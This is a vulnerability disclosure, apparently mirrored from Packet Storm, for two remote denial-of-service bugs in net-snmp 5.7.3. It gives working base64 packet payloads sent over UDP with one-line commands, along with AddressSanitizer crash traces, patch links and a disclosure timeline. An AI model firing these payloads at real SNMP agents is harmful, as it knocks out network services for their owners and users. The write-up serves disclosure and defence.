Lucene search
K

net-snmp 5.7.3 Denial Of Service

🗓️ 09 Oct 2018 00:00:00Reported by Magnus Klaaborg StubmanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

net-snmp 5.7.3 Denial Of Service vulnerability research and found bug

Code
`Full blog post: https://dumpco.re/blog/net-snmp-5.7.3-remote-dos <https://dumpco.re/blog/net-snmp-5.7.3-remote-dos>  
  
Back in january I did some vulnerability research of net-snmp 5.7.3 and found some bugs.  
Here they are:  
  
VULN#1  
======  
  
First bug is remotely exploitable without knowledge of the community string, and leads to Denial of Service:  
  
# echo -n "MIG1AgEDMBECBACeXRsCAwD/4wQBBQIBAwQvMC0EDYAAH4iAWdxIYUWiYyICAQgCAgq5BAVwaXBwbwQMBVsKohj9MlusDerWBAAwbAQFgAAAAAYEAKFZAgQsGA29AgEAAgEAMEswDQEEAWFFg2MiBAChWQIELBgNvQIBAAIBADBLMA0GCSsGAQIBAgI1LjI1NS4wMCEGEisGNS4yNTUuMAEEAYF9CDMKAgEHCobetzgECzE3Mi4zMS4xOS4y" | base64 -d > /dev/udp/127.0.0.1/1111  
  
# net-snmp-5.7.3/agent/snmpd -f -d -V -c ../../snmpd.conf -Ln 127.0.0.1:1111  
ASAN:SIGSEGV  
=================================================================  
==41810==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000007f261b bp 0x7fff34754550 sp 0x7fff34754220 T0)  
#0 0x7f261a in snmp_oid_compare /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:6470:13  
#1 0x7f261a in _snmp_parse /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:4247  
#2 0x7f261a in snmp_parse /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:4336  
#3 0x7f261a in _sess_process_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5241  
#4 0x7ef331 in _sess_read /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5877:14  
#5 0x7ed2e0 in snmp_sess_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5911:10  
#6 0x7ed2e0 in snmp_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5502  
#7 0x4f9286 in receive /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1375:15  
#8 0x4f9286 in main /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1118  
#9 0x7f2561efeb44 in __libc_start_main /build/glibc-6V9RKT/glibc-2.19/csu/libc-start.c:287  
#10 0x4f617c in _start (/home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd+0x4f617c)  
  
AddressSanitizer can not provide additional info.  
SUMMARY: AddressSanitizer: SEGV /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:6470 snmp_oid_compare  
==41810==ABORTING  
  
  
Same configuration for both bugs:  
  
magnus@h4xb0x:~/projects/net-snmp$ cat snmpd.conf  
rocommunity public default -V systemonly  
rocommunity public localhost -V systemonly  
rouser authOnlyUser  
syslocation "On the Desk"  
syscontact Me <[email protected]>  
  
VULN#2  
======  
  
Second bug is remotely exploitable only with knowledge of the community string (in this case "public") leading to Denial of Service:  
  
# echo -n "MIGfAgEBBAZwdWJsaWOhgZECATwCAQECAUAwgYUwIgYSKwYBBAGBfQgzCgIBBwqG3rc1BAwxNzIuMzEuMTkuNzMwFwYSKwYBAgEBCQEEgQECAAqG3rlgAgECMCMGEgsGAQQBgX0IMwoCAQcKht63NgQNMjU1LjI1NS4yNTUuMDAhBhIrBgECAQEJBgECAQoDAIbetzgECzE3Mi4zMS4xOS4y" | base64 -d > /dev/udp/127.0.0.1/1111  
  
# net-snmp-5.7.3/agent/snmpd -f -d -V -c ../../snmpd.conf -Ln 127.0.0.1:1111  
ASAN:SIGSEGV  
=================================================================  
==41062==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000410 (pc 0x00000075bc0f bp 0x7ffdda226b10 sp 0x7ffdda2269e0 T0)  
#0 0x75bc0e in _set_key /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:564:9  
#1 0x75bc0e in _data_lookup /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:614  
#2 0x75bc0e in _container_table_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:749  
#3 0x572262 in netsnmp_call_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:526:15  
#4 0x572dc4 in netsnmp_call_next_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:640:12  
#5 0x58751c in table_helper_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table.c:713:9  
#6 0x572262 in netsnmp_call_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:526:15  
#7 0x572c79 in netsnmp_call_handlers /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:611:14  
#8 0x520d86 in handle_var_requests /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:2679:22  
#9 0x524dbe in handle_pdu /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:3441:18  
#10 0x51b976 in netsnmp_handle_request /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:3284:14  
#11 0x515876 in handle_snmp_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:1990:10  
#12 0x7f3558 in _sess_process_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5437:7  
#13 0x7ef331 in _sess_read /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5877:14  
#14 0x7ed2e0 in snmp_sess_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5911:10  
#15 0x7ed2e0 in snmp_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5502  
#16 0x4f9286 in receive /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1375:15  
#17 0x4f9286 in main /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1118  
#18 0x7fc1acb11b44 in __libc_start_main /build/glibc-6V9RKT/glibc-2.19/csu/libc-start.c:287  
#19 0x4f617c in _start (/home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd+0x4f617c)  
  
AddressSanitizer can not provide additional info.  
SUMMARY: AddressSanitizer: SEGV /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:564 _set_key  
==41062==ABORTING  
  
PATCHES  
=======  
  
Vuln#1: sourceforge.net/p/net-snmp/code/ci/f23bcd3ac6ddee5d0a48f9703007ccc738914791  
Vuln#2: sourceforge.net/p/net-snmp/code/ci/7ffb8e25a0db851953155de91f0170e9bf8c457d  
  
TIMELINE  
========  
  
2015-04-11 Vendor releases patch of bug#1 in version control - no public article or otherwise disclosure  
2016-10-06 Vendor releases patch of bug#2 in version control - no public article or otherwise disclosure  
2018-01-05 I discovered both bugs  
2018-01-08 Vendor notified  
2018-01-08 Vendor responds - bugs already fixed in version control repo  
2018-10-08 Public disclosure of exploit  
  
  
PROOF OF DISCOVERY  
==================  
  
# cat vuln1 | base64  
MIG1AgEDMBECBACeXRsCAwD/4wQBBQIBAwQvMC0EDYAAH4iAWdxIYUWiYyICAQgCAgq5BAVwaXBw  
bwQMBVsKohj9MlusDerWBAAwbAQFgAAAAAYEAKFZAgQsGA29AgEAAgEAMEswDQEEAWFFg2MiBACh  
WQIELBgNvQIBAAIBADBLMA0GCSsGAQIBAgI1LjI1NS4wMCEGEisGNS4yNTUuMAEEAYF9CDMKAgEH  
CobetzgECzE3Mi4zMS4xOS4y  
# sha256sum vuln1  
b2ff63c97c705c25c0043758cbd7b1e00cb5692ba1223712a17461082a047125 vuln1  
twitter.com/magnusstubman/status/949520650762358789  
  
# cat vuln2 | base64  
MIGfAgEBBAZwdWJsaWOhgZECATwCAQECAUAwgYUwIgYSKwYBBAGBfQgzCgIBBwqG3rc1BAwxNzIu  
MzEuMTkuNzMwFwYSKwYBAgEBCQEEgQECAAqG3rlgAgECMCMGEgsGAQQBgX0IMwoCAQcKht63NgQN  
MjU1LjI1NS4yNTUuMDAhBhIrBgECAQEJBgECAQoDAIbetzgECzE3Mi4zMS4xOS4y  
# sha256sum vuln2  
b7f0e494b8a91c6fedb7e13b3b8dab68a951b5fdc21dd876ae91eb86924018f2 vuln2  
twitter.com/magnusstubman/status/949520565064404994  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Oct 2018 00:00Current
7.4High risk
Vulners AI Score7.4
28